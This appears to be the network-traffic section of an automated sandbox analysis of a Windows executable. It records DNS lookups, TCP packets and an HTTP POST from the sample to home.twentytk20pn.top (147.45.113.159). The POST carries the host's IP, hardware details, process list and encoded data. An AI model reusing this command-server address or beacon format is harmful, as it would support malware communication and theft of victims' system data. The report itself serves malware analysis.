                                                            Dec 20, 2024 17:30:35.766262054 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766298056 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766324043 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766334057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766345024 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766388893 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766403913 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766426086 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766474009 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766544104 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766552925 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766575098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766787052 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766840935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766964912 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767060041 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767070055 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767092943 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767165899 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767174959 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767311096 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767327070 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767467022 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767857075 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767867088 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767875910 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767885923 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767896891 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767909050 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767918110 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767941952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767951965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767961025 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768179893 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768189907 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768198967 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768208027 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768218994 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768347025 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768356085 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.832124949 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.832268953 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884352922 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884627104 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884704113 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884713888 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884763956 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884866953 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884877920 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.885623932 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.885695934 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.885838985 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.885883093 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.885998964 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886008024 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886029959 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886164904 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886177063 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886197090 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886226892 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886238098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886738062 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886778116 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886965990 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887007952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887028933 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887038946 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887162924 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887172937 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887206078 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887217045 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887296915 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887340069 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887386084 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887463093 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887471914 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887480974 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887509108 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887520075 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887643099 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887682915 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887761116 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887888908 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887901068 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887928009 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888063908 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888227940 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888237000 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888262033 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888360023 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888370037 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888381004 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888415098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888425112 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888569117 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888741016 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888874054 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888883114 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888891935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888902903 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888962030 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888972044 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888983965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888993025 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.889002085 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.889246941 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.889302015 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.905395031 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.905580997 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.905625105 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.905889034 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:36.005291939 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005434036 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005471945 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005494118 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005534887 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005548954 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005647898 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005660057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005683899 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005789042 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005857944 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006069899 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006083965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006122112 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006134033 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006201029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006447077 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006457090 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006474018 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006494999 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006506920 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006519079 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006529093 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006540060 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006548882 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006572008 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006581068 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006660938 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006670952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006719112 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006777048 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006844044 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007098913 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007108927 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007118940 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007280111 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007289886 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007301092 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007334948 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007344961 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007356882 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007385015 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007395029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007405043 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007409096 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007430077 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007440090 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007451057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007455111 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007457972 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007467985 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007483959 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007497072 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007515907 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.008757114 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.008959055 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009073973 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009084940 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009094000 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009104967 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009144068 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009154081 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009164095 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009268045 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009279013 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009318113 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009326935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009347916 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009357929 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009397984 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009474993 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009561062 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009572029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009675980 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009686947 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009699106 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009882927 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010010958 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010020971 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010031939 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010160923 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010173082 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010181904 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010193110 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010204077 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010226965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010303974 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010314941 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010327101 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010339022 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010540962 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010550976 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010564089 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010575056 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010585070 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010668039 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010679007 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010942936 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010962009 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010972023 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010982037 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010993004 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.011003971 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.011015892 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.011070013 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.011081934 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.011182070 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.011195898 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.025253057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.025319099 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:37.176873922 CET4972880192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:37.296971083 CET8049728147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:37.297059059 CET4972880192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:37.297437906 CET4972880192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:37.417361975 CET8049728147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:38.778016090 CET8049728147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:38.778281927 CET8049728147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:38.778345108 CET4972880192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:38.778578043 CET4972880192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:38.898164988 CET8049728147.45.113.159192.168.2.11

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 17:30:30.409610987 CET5252453192.168.2.111.1.1.1
                                                            Dec 20, 2024 17:30:30.409688950 CET5252453192.168.2.111.1.1.1
                                                            Dec 20, 2024 17:30:30.546689034 CET53525241.1.1.1192.168.2.11
                                                            Dec 20, 2024 17:30:30.701977015 CET53525241.1.1.1192.168.2.11
                                                            Dec 20, 2024 17:30:34.190315962 CET5252753192.168.2.111.1.1.1
                                                            Dec 20, 2024 17:30:34.190751076 CET5252753192.168.2.111.1.1.1
                                                            Dec 20, 2024 17:30:34.327322006 CET53525271.1.1.1192.168.2.11
                                                            Dec 20, 2024 17:30:34.327483892 CET53525271.1.1.1192.168.2.11
                                                            Dec 20, 2024 17:30:37.037614107 CET5252953192.168.2.111.1.1.1
                                                            Dec 20, 2024 17:30:37.037734985 CET5252953192.168.2.111.1.1.1
                                                            Dec 20, 2024 17:30:37.175995111 CET53525291.1.1.1192.168.2.11
                                                            Dec 20, 2024 17:30:37.176065922 CET53525291.1.1.1192.168.2.11

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 20, 2024 17:30:30.409610987 CET192.168.2.111.1.1.10x9484Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:30.409688950 CET192.168.2.111.1.1.10x577bStandard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 20, 2024 17:30:34.190315962 CET192.168.2.111.1.1.10x8144Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:34.190751076 CET192.168.2.111.1.1.10xc7eaStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                            Dec 20, 2024 17:30:37.037614107 CET192.168.2.111.1.1.10xbdd8Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:37.037734985 CET192.168.2.111.1.1.10xf185Standard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 20, 2024 17:30:24.051780939 CET1.1.1.1192.168.2.110xc7eaNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 20, 2024 17:30:24.051780939 CET1.1.1.1192.168.2.110xc7eaNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:30.701977015 CET1.1.1.1192.168.2.110x9484No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:30.701977015 CET1.1.1.1192.168.2.110x9484No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:34.327322006 CET1.1.1.1192.168.2.110x8144No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 17:30:37.175995111 CET1.1.1.1192.168.2.110xbdd8No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.twentytk20pn.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1149723147.45.113.159807772C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 17:30:34.451566935 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 577602
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 32 32 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734712231", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 764 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": 856 }, { "name": "svchost.exe", "pid": 916 }, { "name": "dwm.exe", "pid": 980 }, { "name": "svchost.exe", "pid": 352 }, { "name": "svchost.exe", "pid": 476 }, { "name": "svchost.exe", "pid": 660 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Dec 20, 2024 17:30:34.571465969 CET4944OUTData Raw: 76 45 48 69 62 77 58 6b 45 71 31 44 47 35 78 54 78 4f 4f 6f 56 4a 30 71 6d 58 35 5a 46 34 5c 2f 46 30 36 39 4a 75 4e 54 44 31 5c 2f 59 58 77 32 44 72 77 73 2b 65 6e 6a 73 52 68 70 52 74 5a 2b 39 4b 4b 66 36 62 77 7a 34 50 2b 49 48 46 56 50 44 34
                                                            Data Ascii: vEHibwXkEq1DG5xTxOOoVJ0qmX5ZF4\/F069JuNTD1\/YXw2Drws+enjsRhpRtZ+9KKf6bwz4P+IHFVPD4rA5DWweXYmnTr0c0ziUcrwVXDVoxlSxWGWJti8fhqqlF062XYXGQmryTcYTcfksf8tPx\/rUdforY\/Br4QeJtFUXPgiXw\/M8jMNR8JeKfEsGoIwI2xlfFuoeM9LktuD5kf9lx3LgkJewna6+X+I\/2R78+ZN4A8
                                                            Dec 20, 2024 17:30:34.571490049 CET4944OUTData Raw: 2b 48 35 55 47 6c 50 72 38 76 31 47 65 59 6e 79 4a 76 32 66 76 66 2b 65 76 37 67 66 36 4c 5c 2f 41 50 71 35 2b 6c 4d 58 39 35 73 64 5c 2f 4c 64 5c 2f 2b 57 51 5c 2f 35 59 65 5c 2f 54 33 5c 2f 50 76 54 79 72 79 66 38 41 4c 62 59 6e 36 51 39 73 66
                                                            Data Ascii: +H5UGlPr8v1GeYnyJv2fvf+ev7gf6L\/APq5+lMX95sd\/Ld\/+WQ\/5Ye\/T3\/PvTyryf8ALbYn6Q9sfj7fT3pmdzbE8zZ5X\/LP\/lsf0\/ye9BvDf5fqiH\/v28n\/AG6\/5\/pg96P9yT78v72Pnz80\/wCTh\/8AUP1l5x6\/54o8t5P9c\/EfHH+enp\/nFey8o\/d\/wDUh3GNZtn3\/AOv+foaZ5ny\/Onz+b5X2eS
                                                            Dec 20, 2024 17:30:34.571744919 CET4944OUTData Raw: 2f 6a 37 34 6b 65 4d 64 4a 66 58 4c 66 77 5c 2f 59 65 4e 72 76 53 6c 38 57 7a 65 42 74 4c 73 74 66 6e 31 4f 31 30 77 61 78 63 36 51 39 72 71 48 68 6e 53 47 51 33 58 67 39 6e 62 37 55 5c 2f 77 43 43 61 48 78 71 30 6e 34 45 5c 2f 77 44 42 4d 62 78
                                                            Data Ascii: /j74keMdJfXLfw\/YeNrvSl8WzeBtLstfn1O10waxc6Q9rqHhnSGQ3Xg9nb7U\/wCCaHxq0n4E\/wDBMbxZ4u1n9qT\/AIZItdR\/bw13w5H8R\/8AhSNz8ev7bnu\/2ffAepr4I\/4Q+10rV5NN\/tKPSJde\/wCElNsiWf8Awjf9lmdW1hY5f4kweZY2GOnQxmJjWhSoylVioYako1UoOUPaSVGN6cm4ScqkYuSe+jf96cH+K
